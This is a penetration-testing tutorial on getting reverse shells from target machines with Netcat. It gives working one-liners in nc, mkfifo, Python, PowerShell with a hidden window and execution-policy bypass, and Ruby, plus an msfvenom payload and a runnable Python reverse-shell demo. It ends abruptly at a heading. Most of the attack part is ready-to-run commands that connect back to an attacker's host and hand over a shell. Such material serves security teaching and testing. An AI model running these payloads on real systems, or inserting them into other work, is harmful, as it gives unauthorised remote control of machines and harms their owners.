In this article, we will learn how to use Netcat to get reverse shells from targeted machines.
Netcat, often called the "Swiss Army knife" of networking, is a simple but powerful command-line tool for reading and writing data across network connections. It can be used for a variety of tasks, including port scanning, transferring files, creating backdoors, and setting up network connections between machines.
Netcat is like a communication tool that lets two computers talk to each other over a network. You can use it to send or receive data between machines by specifying an IP address and port number. Think of it as a direct link between computers, where you can transfer text, files, or commands from one machine to another.
A reverse shell is a type of remote shell where the target machine initiates the connection back to the attacker's machine, unlike a traditional shell where the attacker connects to the target. This technique is often used in penetration testing to bypass firewalls or network restrictions because the outgoing connection is more likely to be allowed by the target machine’s firewall.
What You’ll Learn in This Article
- Using Netcat
- Using Python
- Using Msfvenom
- Using Powershell
- Using Ruby
Netcat Usages
1. Netcat with -e:
The -e option hands the connection straight to a program. It exists in traditional netcat (netcat-traditional) and in Ncat, but not in the OpenBSD netcat that most distributions ship as nc; if -e is missing on the target, use the mkfifo method below.
On the attacker's machine
nc -lvp 4444
On the target machine
nc <attacker_IP> 4444 -e /bin/bash
2. Netcat with mkfifo (for netcat builds without -e):
On the attacker's machine
nc -lvp 4444
On the target machine
mkfifo /tmp/f; nc <attacker_IP> 4444 < /tmp/f | /bin/sh > /tmp/f 2>&1; rm /tmp/f
/tmp/f is a named pipe: nc reads its standard input from the pipe, whatever nc receives from the attacker is piped into /bin/sh, and the shell's output and errors (2>&1) are written back into the pipe, where nc picks them up and sends them to the attacker. The rm only runs after the session ends.
Using Python
On the attacker's machine
nc -lvp 4444
On the target machine
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attacker_IP>",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
The three dup2 calls attach the shell's stdin, stdout and stderr to the socket, so /bin/sh -i talks directly to the attacker. Use python or python2 instead of python3 if that is what the target has installed.
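To make the mechanics concrete, here is an added example (not code from the original article) that runs both ends of a reverse shell in one process on 127.0.0.1. The "target" side initiates the TCP connection and then reads a command line, runs it through the system shell and sends the output back, the way the Ruby and PowerShell one-liners do; the "attacker" side only listens, like nc -lvp 4444. The 4-byte length prefix used to frame each reply and the `exit` sentinel are conventions of this example, not of Netcat.

```python
import socket
import struct
import subprocess
import threading

# Added example, not code from the original article: both ends of a reverse
# shell in one process so it runs offline. "Attacker" and "target" both live on
# 127.0.0.1 here; in practice they are two hosts and the target's firewall only
# has to allow the outbound connection.
HOST = "127.0.0.1"


def target_side(attacker_host: str, attacker_port: int) -> None:
    """The target connects out (the defining property of a reverse shell),
    then loops: read one command line, run it with the system shell, send
    stdout+stderr back with a 4-byte length prefix (a framing convention of
    this example). This mirrors the Ruby and PowerShell one-liners, which read
    a line and execute it; the Python one-liner instead dup2()s the socket
    onto a real /bin/sh's stdio."""
    with socket.create_connection((attacker_host, attacker_port)) as s:
        rd = s.makefile("rb")
        for line in rd:
            cmd = line.decode(errors="replace").strip()
            if cmd == "exit":  # sentinel chosen for this example
                break
            proc = subprocess.run(cmd, shell=True, capture_output=True)
            out = proc.stdout + proc.stderr
            s.sendall(struct.pack("!I", len(out)) + out)


def attacker_side(listener: socket.socket, commands: list) -> list:
    """The attacker only listens, like `nc -lvp 4444`, accepts the inbound
    connection, sends each command, and reads the length-prefixed reply."""
    conn, _peer = listener.accept()
    outputs = []
    with conn:
        rd = conn.makefile("rb")
        for cmd in commands:
            conn.sendall(cmd.encode() + b"\n")
            (n,) = struct.unpack("!I", rd.read(4))
            outputs.append(rd.read(n).decode(errors="replace"))
        conn.sendall(b"exit\n")
    return outputs


def run_reverse_shell_demo(commands: list) -> list:
    """Listen on an ephemeral port, let the 'target' thread connect back, run
    `commands` over the channel and return their outputs in order."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind((HOST, 0))
    listener.listen(1)
    port = listener.getsockname()[1]
    t = threading.Thread(target=target_side, args=(HOST, port), daemon=True)
    t.start()
    try:
        return attacker_side(listener, commands)
    finally:
        listener.close()
        t.join(timeout=5)


if __name__ == "__main__":
    cmds = ["echo connected back", "id"]
    for cmd, out in zip(cmds, run_reverse_shell_demo(cmds)):
        print(f"$ {cmd}\n{out}", end="")
```

The point to notice is the direction of the connect() call: the listener never reaches out to the target, so nothing about the target's inbound filtering matters, only that it can open an outbound TCP session to the attacker's port.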
Using Msfvenom
On the attacker's machine, generate a Linux reverse-shell payload that connects back to port 4444:
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<attacker_IP> LPORT=4444 -f elf > shell.elf
Transfer shell.elf to the target and start the port-4444 listener on the attacker's machine. Then, on the target, make the file executable and run it:
chmod +x shell.elf
./shell.elf
Using PowerShell
On the attacker's machine
nc -lvp 4444
On the target machine (Windows)
powershell -NoP -NonI -W Hidden -Exec Bypass -Command $client = New-Object System.Net.Sockets.TCPClient("<attacker_IP>",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Note the $client = assignment at the start: the widely copied version of this one-liner omits it, so $client.GetStream() fails on a null object and no shell ever comes back. The loop reads a line from the attacker, runs it with iex (Invoke-Expression), and writes the output plus a fake "PS path>" prompt back down the socket.
Using Ruby
On the attacker's machine
nc -lvp 4444
On the target machine
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("<attacker_IP>","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
The exit if fork detaches the process into the background; the loop then reads one line at a time from the socket, runs it with IO.popen and prints the output back to the attacker. There is no prompt, so type a command and wait for its output.
File Transfer
Netcat can be used to transfer files between devices. Here we will create a scenario where we transfer a file from a Windows system to a Kali Linux system. On the Windows side, Netcat listens on port 8888 and serves the file from its standard input (note the < redirection; without it Netcat would treat file.txt as a hostname). The -w 20 timeout closes the listener if nothing connects within 20 seconds.
nc -v -w 20 -p 8888 -l < file.txt
On the Kali side, connect to the Windows machine on port 8888 and redirect Netcat's standard output into a file; the transfer ends when the sender closes the connection.
UDP Mode
Use Netcat in UDP mode for sending and receiving UDP packets. UDP is connectionless, making it suitable for applications like streaming media or DNS queries.
Listen:
nc -u -l -p <port>
Send:
nc -u <destination_ip> <port>
Port Forwarding
Incoming connections to the local port are redirected to the specified destination IP and port, so a host that can reach only the machine running Netcat can still talk to the destination through it.
nc -l -p <local_port> -c "nc <destination_ip> <destination_port>"
The -c option (run a command through /bin/sh and connect its stdin/stdout to the connection) is available in GNU netcat and Ncat; the OpenBSD netcat has neither -c nor -e, so this one-liner will not work there. As written it handles a single connection and then exits.
Port Redirection:
Redirect an incoming connection from one port to another on the same machine. Netcat listens on the local port; when a client connects, it starts a second Netcat listening on the redirection port, and the next client to connect there is joined to the first connection, so the two clients end up talking to each other through this host. The same -c availability caveat as above applies.
nc -l -p <local_port> -c "nc -l <redirection_port>"
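The forwarding command above, as an added example (not code from the original article) written out in Python so it runs offline: a listener accepts one inbound connection, opens an outbound connection to the destination, and pumps bytes in both directions until both sides close, which is what nc -l -p <local_port> -c "nc <destination_ip> <destination_port>" does for one connection. The echo server standing in for the destination and the 127.0.0.1 addresses are constructed for the demo.

```python
import socket
import threading

# Added example (not from the original article): a minimal TCP port forwarder
# equivalent to `nc -l -p <local_port> -c "nc <destination_ip> <destination_port>"`
# for one connection, plus a constructed echo server standing in for the real
# destination so everything runs offline on 127.0.0.1.
HOST = "127.0.0.1"


def _pump(src: socket.socket, dst: socket.socket) -> None:
    """Copy bytes one way until src hits EOF, then half-close dst so the other
    direction can drain and finish on its own (this is what lets a client's
    shutdown(SHUT_WR) propagate through the relay to the destination)."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def forward_one_connection(listener: socket.socket, dest: tuple) -> None:
    """Accept a single inbound connection, open an outbound connection to
    `dest`, and relay both directions until both sides have closed."""
    inbound, _ = listener.accept()
    outbound = socket.create_connection(dest)
    with inbound, outbound:
        a = threading.Thread(target=_pump, args=(inbound, outbound))
        b = threading.Thread(target=_pump, args=(outbound, inbound))
        a.start()
        b.start()
        a.join()
        b.join()


def echo_one_connection(listener: socket.socket) -> None:
    """Constructed stand-in for the destination service: echo back whatever
    arrives, then close once the client half-closes."""
    conn, _ = listener.accept()
    with conn:
        while True:
            data = conn.recv(4096)
            if not data:
                break
            conn.sendall(data)


def _listen_ephemeral() -> socket.socket:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind((HOST, 0))
    s.listen(1)
    return s


def forward_demo(payload: bytes) -> bytes:
    """Send `payload` to the forwarder's port and return what comes back;
    it equals `payload` only if the relay carried both directions."""
    dest_listener = _listen_ephemeral()   # the "destination_ip:destination_port"
    fwd_listener = _listen_ephemeral()    # the "local_port" clients connect to
    dest_addr = dest_listener.getsockname()
    fwd_addr = fwd_listener.getsockname()
    threads = [
        threading.Thread(target=echo_one_connection, args=(dest_listener,), daemon=True),
        threading.Thread(target=forward_one_connection, args=(fwd_listener, dest_addr), daemon=True),
    ]
    for t in threads:
        t.start()
    # The client only ever talks to the forwarder; it never learns dest_addr.
    with socket.create_connection(fwd_addr) as client:
        client.sendall(payload)
        client.shutdown(socket.SHUT_WR)
        received = b""
        while True:
            chunk = client.recv(4096)
            if not chunk:
                break
            received += chunk
    for t in threads:
        t.join(timeout=5)
    dest_listener.close()
    fwd_listener.close()
    return received


if __name__ == "__main__":
    print(forward_demo(b"hello through the relay\n").decode(), end="")
```

Two things this makes visible that the one-liner hides: the relay needs a thread (or a select loop) per direction, and EOF has to be propagated as a half-close rather than a full close, otherwise the reply path is torn down before the destination has answered.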
These examples show how to use Netcat to obtain a connection to a target under different constraints (which interpreters are installed, whether nc supports -e, Windows versus Linux). There are many more ways to get a shell with Netcat; the listener side stays the same in every case.
How the Reverse Shell Works